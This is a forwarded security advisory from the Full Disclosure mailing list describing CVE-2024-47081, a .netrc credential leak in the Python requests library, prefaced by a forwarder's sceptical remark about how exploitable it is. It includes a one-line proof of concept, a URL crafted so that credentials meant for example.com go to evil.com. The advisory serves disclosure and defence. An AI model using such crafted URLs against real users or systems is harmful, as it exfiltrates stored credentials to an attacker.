[I'm not sure how the attacker is supposed to get the victim to make a requests call using a URL the attacker controls, but that didn't stop them from getting a CVE issued for this. -alan- ]
-------- Forwarded Message -------- Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library Date: Sat, 31 May 2025 06:30:50 +0000 From: Juho Forsén via Fulldisclosure <fulldisclos...@seclists.org> Reply-To: Juho Forsén <jupe...@protonmail.ch> To: fulldisclos...@seclists.org <fulldisclos...@seclists.org> The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/') Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/